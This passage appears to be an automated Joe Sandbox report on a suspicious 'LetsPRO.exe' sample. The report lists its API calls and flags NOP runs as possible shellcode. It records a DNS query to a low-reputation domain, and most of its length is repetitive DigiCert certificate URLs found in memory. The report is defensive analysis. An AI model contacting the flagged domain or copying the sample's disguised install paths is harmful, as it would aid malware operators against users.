Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94D56F _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson, 5_2_6C94D56F
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C951054 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C951054
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94F051 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C94F051
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00254318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor, 8_2_00254318
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00265490 FindFirstFileExW, 8_2_00265490
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_0001CBAB FindFirstFileExW, 16_2_0001CBAB
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_0012DB25 FindFirstFileExW, 30_2_0012DB25
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDB6417 FindFirstFileW,GetLastError,PathStripPathW,PathStripPathW,PathStripPathW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,FindNextFileW,GetLastError,FindClose, 30_2_6CDB6417
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC98E75 FindFirstFileW,GetLastError,DeleteFileW,FindNextFileW,GetLastError,FindClose, 30_2_6CC98E75
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC98FBC GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW, 30_2_6CC98FBC
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC9ED9F FindFirstFileW,FindNextFileW,FindClose, 30_2_6CC9ED9F
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC9AA6F FindFirstFileW,FindNextFileW,FindClose, 30_2_6CC9AA6F
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCCA66F FindFirstFileW,FindClose,FindNextFileW, 30_2_6CCCA66F
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC98D3E FindFirstFileW,FindNextFileW,GetLastError,FindClose, 30_2_6CC98D3E
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F380F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW, 4_2_03F380F0
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4x nop then jo 6C931931h 5_2_6C9084A8
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4x nop then mov byte ptr [ebp-00000090h], FFFFFFFEh 5_2_6C8FF4A2
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4x nop then push esi 5_2_6C8FF6B0

Networking
barindex
Performs DNS queries to domains with low reputation
Source: DNS query: 156.248.54.11.webcamcn.xyz
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: Africa-on-Cloud-ASZA Africa-on-Cloud-ASZA
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_025F3330 recv,timeGetTime,_memmove, 4_2_025F3330
Source: global traffic DNS traffic detected: DNS query: 156.248.54.11.webcamcn.xyz
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: goopdateres_ko.dll.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 